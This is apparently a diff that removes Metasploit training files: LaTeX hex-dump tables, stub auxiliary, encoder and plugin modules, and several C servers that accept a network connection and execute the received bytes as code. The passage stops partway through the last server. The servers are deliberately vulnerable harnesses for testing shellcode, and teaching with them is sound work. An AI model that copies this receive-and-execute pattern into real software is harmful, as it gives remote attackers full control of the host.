|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 141
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 \color{Hexy17}11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}10 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}20 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}30 \color{Hexy17}11 11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}40 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a
|
||||
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39
|
||||
\color{HexyGreen}80 \color{Hexy18}12 12 \color{Hexy0}00 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy58}3a \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy58}3a \color{Hexy57}39
|
||||
\color{HexyGreen}c0 \color{Hexy18}12 12 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy57}39 39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy17}11 11
|
||||
\end{semiverbatim}
|
||||
}
|
|
@ -1,166 +0,0 @@
|
|||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
|
||||
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 141
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}10 \color{Hexy17}11 11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}20 \color{Hexy18}12 12 12 12 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}30 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}40 \color{Hexy57}39 \color{Hexy58}3a 3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39
|
||||
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39
|
||||
\color{HexyGreen}80 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a 3a 3a \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy57}39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39
|
||||
\color{HexyGreen}c0 \color{Hexy17}11 11 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy58}3a \color{Hexy0}00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy58}3a \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy16}10 10
|
||||
\end{semiverbatim}
|
||||
}
|
@ -1,19 +0,0 @@
|
|||
module Msf
|
||||
|
||||
class Auxiliary::BhAux < Msf::Auxiliary
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => "BlackHat Training Auxiliary Module",
|
||||
'Description' => "Example Auxiliary Module",
|
||||
'Author' => "skape",
|
||||
'License' => MSF_LICENSE)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Inside run...")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -1,22 +0,0 @@
|
|||
module Msf
|
||||
module Encoders
|
||||
|
||||
class BlackHatEncoder < Msf::Encoder
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BlackHat Example Encoder',
|
||||
'Version' => '$Revision: 3154 $',
|
||||
'Description' => %q{
|
||||
Sample encoder that just returns the block it's passed
|
||||
when encoding occurs.
|
||||
},
|
||||
'Author' => 'skape',
|
||||
'Arch' => ARCH_ALL)
|
||||
end
|
||||
|
||||
def encode_block(state, buf)
|
||||
buf
|
||||
end
|
||||
|
||||
end ;end ;end
|
|
@ -1,12 +0,0 @@
|
|||
module Msf
|
||||
class Plugin::Bob < Msf::Plugin
|
||||
module BobExtension
|
||||
def bob
|
||||
"bob"
|
||||
end
|
||||
end
|
||||
def initialize(framework, options)
|
||||
framework.extend(BobExtension)
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,116 +0,0 @@
|
|||
|
||||
/*
|
||||
* srv.c -- Example server for easy exploiting
|
||||
*
|
||||
* Usage: srv <port>
|
||||
*
|
||||
* Example:
|
||||
*
|
||||
* C:\> srv 1234
|
||||
* C:\> nload localhost 1234 -s code.s
|
||||
*
|
||||
*/
|
||||
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
|
||||
#if defined _WIN32
|
||||
#include <winsock2.h>
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
#else
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netdb.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#define SERVER_PORT 5433
|
||||
#define MAX_PENDING 1
|
||||
|
||||
|
||||
int ehlo, from;
|
||||
|
||||
/* Main function */
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
struct sockaddr_in sin;
|
||||
char buf[8092], *ptr;
|
||||
int c, i, len, port;
|
||||
int s, new_s, bytes;
|
||||
#if defined _WIN32
|
||||
int wsaret;
|
||||
WSADATA wsaData;
|
||||
#endif
|
||||
int (*funct)();
|
||||
|
||||
|
||||
/* Command line parameters */
|
||||
if (argv[1])
|
||||
port = atoi(argv[1]);
|
||||
else
|
||||
port = SERVER_PORT;
|
||||
|
||||
#if defined _WIN32
|
||||
/* Initialize winsock */
|
||||
wsaret = WSAStartup(0x101, &wsaData);
|
||||
if(wsaret != 0)
|
||||
return (0);
|
||||
|
||||
/* Create a socket */
|
||||
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
|
||||
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
#else
|
||||
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
||||
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
/* Initialize the addres data structure */
|
||||
memset((void *)&sin, 0, sizeof(sin));
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = INADDR_ANY;
|
||||
sin.sin_port = htons(port);
|
||||
|
||||
/* Bind an address to the socket */
|
||||
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
|
||||
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* Set the length of the listen queue */
|
||||
if (listen(s, MAX_PENDING) < 0) {
|
||||
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
len = sizeof(sin);
|
||||
new_s = accept(s, (struct sockaddr *)&sin, &len);
|
||||
|
||||
memset(buf, 0, sizeof(buf));
|
||||
bytes = recv(new_s, buf, sizeof(buf), 0);
|
||||
|
||||
printf("recv'd %d\n", bytes);
|
||||
|
||||
|
||||
/* Run the code */
|
||||
fprintf(stderr,"Oops.. I'm 0wned.\n");
|
||||
|
||||
__asm mov edi, new_s
|
||||
|
||||
funct = (int (*)()) buf;
|
||||
(int)(*funct)();
|
||||
|
||||
return (0);
|
||||
|
||||
}
|
||||
|
||||
|
|
@ -1,123 +0,0 @@
|
|||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
|
||||
#if defined _WIN32
|
||||
#include <winsock2.h>
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
#else
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netdb.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#define SERVER_PORT 5432
|
||||
#define MAX_PENDING 1
|
||||
|
||||
|
||||
int ehlo, from;
|
||||
|
||||
/* Main function */
|
||||
|
||||
void Runner(int new_s);
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
struct sockaddr_in sin;
|
||||
char buf[8092], *ptr;
|
||||
int c, i, len, port;
|
||||
int s, new_s, bytes;
|
||||
#if defined _WIN32
|
||||
int wsaret;
|
||||
WSADATA wsaData;
|
||||
#endif
|
||||
int (*funct)();
|
||||
|
||||
|
||||
/* Command line parameters */
|
||||
if (argv[1])
|
||||
port = atoi(argv[1]);
|
||||
else
|
||||
port = SERVER_PORT;
|
||||
|
||||
#if defined _WIN32
|
||||
/* Initialize winsock */
|
||||
wsaret = WSAStartup(0x101, &wsaData);
|
||||
if(wsaret != 0)
|
||||
return (0);
|
||||
|
||||
/* Create a socket */
|
||||
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
|
||||
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
#else
|
||||
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
||||
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
/* Initialize the addres data structure */
|
||||
memset((void *)&sin, 0, sizeof(sin));
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = INADDR_ANY;
|
||||
sin.sin_port = htons(port);
|
||||
|
||||
/* Bind an address to the socket */
|
||||
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
|
||||
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* Set the length of the listen queue */
|
||||
if (listen(s, MAX_PENDING) < 0) {
|
||||
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
while (1)
|
||||
{
|
||||
__try
|
||||
{
|
||||
len = sizeof(sin);
|
||||
new_s = accept(s, (struct sockaddr *)&sin, &len);
|
||||
|
||||
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
|
||||
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
|
||||
}
|
||||
}
|
||||
|
||||
return (0);
|
||||
|
||||
}
|
||||
|
||||
void Runner(int new_s)
|
||||
{
|
||||
char buf[8092];
|
||||
int len;
|
||||
int bytes;
|
||||
int (*funct)();
|
||||
|
||||
__try
|
||||
{
|
||||
memset(buf, 0, sizeof(buf));
|
||||
bytes = recv(new_s, buf, sizeof(buf), 0);
|
||||
|
||||
printf("recv'd %d\n", bytes);
|
||||
|
||||
__asm mov edi, new_s
|
||||
|
||||
funct = (int (*)()) buf;
|
||||
(int)(*funct)();
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
|
||||
}
|
||||
}
|
|
@ -1,119 +0,0 @@
|
|||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
//#include <windows.h>
|
||||
|
||||
#if defined _WIN32
|
||||
#include <winsock2.h>
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
#else
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netdb.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#define SERVER_PORT 5432
|
||||
#define MAX_PENDING 1
|
||||
|
||||
|
||||
int ehlo, from;
|
||||
|
||||
/* Main function */
|
||||
|
||||
void Runner(int new_s);
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
struct sockaddr_in sin;
|
||||
char buf[8092], *ptr;
|
||||
int c, i, len, port;
|
||||
int s, new_s, bytes;
|
||||
#if defined _WIN32
|
||||
int wsaret;
|
||||
WSADATA wsaData;
|
||||
#endif
|
||||
int (*funct)();
|
||||
|
||||
|
||||
/* Command line parameters */
|
||||
if (argv[1])
|
||||
port = atoi(argv[1]);
|
||||
else
|
||||
port = SERVER_PORT;
|
||||
|
||||
#if defined _WIN32
|
||||
/* Initialize winsock */
|
||||
wsaret = WSAStartup(0x101, &wsaData);
|
||||
if(wsaret != 0)
|
||||
return (0);
|
||||
|
||||
/* Create a socket */
|
||||
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
|
||||
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
#else
|
||||
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
||||
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
/* Initialize the addres data structure */
|
||||
memset((void *)&sin, 0, sizeof(sin));
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = INADDR_ANY;
|
||||
sin.sin_port = htons(port);
|
||||
|
||||
/* Bind an address to the socket */
|
||||
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
|
||||
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
